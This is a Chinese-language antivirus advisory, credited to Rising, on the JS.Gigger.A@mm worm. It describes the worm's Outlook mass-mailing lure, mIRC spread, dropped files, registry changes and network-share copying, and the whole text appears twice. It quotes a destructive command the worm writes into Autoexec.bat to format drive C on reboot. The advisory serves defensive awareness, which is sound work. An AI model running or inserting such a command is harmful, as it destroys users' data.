JS.Gigger.A冒充Outlook升级文件格式化C盘

病毒名称：JS.Gigger.A@mm

JS.Gigger.A@mm是一个用JavaScript编写的蠕虫，它利用Outlook和mIRC进行传播，该蠕虫会在系统下次启动后试图删除硬盘上所有的文件，并格式化C盘。

破坏方式：
向所有Microsoft Outlook地址发送大量带毒邮件；
修改Autoexec.bat文件，格式化C盘，删除本地所有文件，同时感染网络共享。


1） JS.Gigger.A@mm通过发送大量邮件来传播，邮件格式如下：

Subject: Outlook Express Update
（主题：Outlook Express 更新）
Message: MSNSofware Co.
（消息：MSN软件公司）
Attachement: Mmsn_offline.htm
（附件：Mmsn_offline.htm）


2） 蠕虫被执行后，将在系统中安装下列文件：

C:\Bla.hta
C:\B.htm
C:\Windows\Samples\Wsh\Charts.js
C:\Windows\Help\Mmsn_offline.htm


3） 向Autoexec.bat文件中添加一行指令：

ECHO y|format c:

这样，当系统再次启动后C盘将被格式化。

4）然后，蠕虫安装一个Script.ini，该脚本是mIRC客户端运行所必须的，蠕虫正是利用该文件通过IRC进行传播。

5）修改注册表：

HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_CURRENT_USER\Software\TheGrave\badUsers\v2.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

添加值：NAV DefAlert

6）如果本地系统与局域网连接，蠕虫将搜索网络驱动器并将自身以\Windows\Start Menu\Programs\StartUp\Msoe.hta文件名进行复制。

7）删除本地硬盘中的所有文件。






--------------------------------------------------------------------------------

　
(瑞星编译)

病毒名称：JS.Gigger.A@mm

JS.Gigger.A@mm是一个用JavaScript编写的蠕虫，它利用Outlook和mIRC进行传播，该蠕虫会在系统下次启动后试图删除硬盘上所有的文件，并格式化C盘。

破坏方式：
向所有Microsoft Outlook地址发送大量带毒邮件；
修改Autoexec.bat文件，格式化C盘，删除本地所有文件，同时感染网络共享。


1） JS.Gigger.A@mm通过发送大量邮件来传播，邮件格式如下：

Subject: Outlook Express Update
（主题：Outlook Express 更新）
Message: MSNSofware Co.
（消息：MSN软件公司）
Attachement: Mmsn_offline.htm
（附件：Mmsn_offline.htm）


2） 蠕虫被执行后，将在系统中安装下列文件：

C:\Bla.hta
C:\B.htm
C:\Windows\Samples\Wsh\Charts.js
C:\Windows\Help\Mmsn_offline.htm


3） 向Autoexec.bat文件中添加一行指令：

ECHO y|format c:

这样，当系统再次启动后C盘将被格式化。

4）然后，蠕虫安装一个Script.ini，该脚本是mIRC客户端运行所必须的，蠕虫正是利用该文件通过IRC进行传播。

5）修改注册表：

HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout
HKEY_CURRENT_USER\Software\TheGrave\badUsers\v2.0

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

添加值：NAV DefAlert

6）如果本地系统与局域网连接，蠕虫将搜索网络驱动器并将自身以\Windows\Start Menu\Programs\StartUp\Msoe.hta文件名进行复制。

7）删除本地硬盘中的所有文件。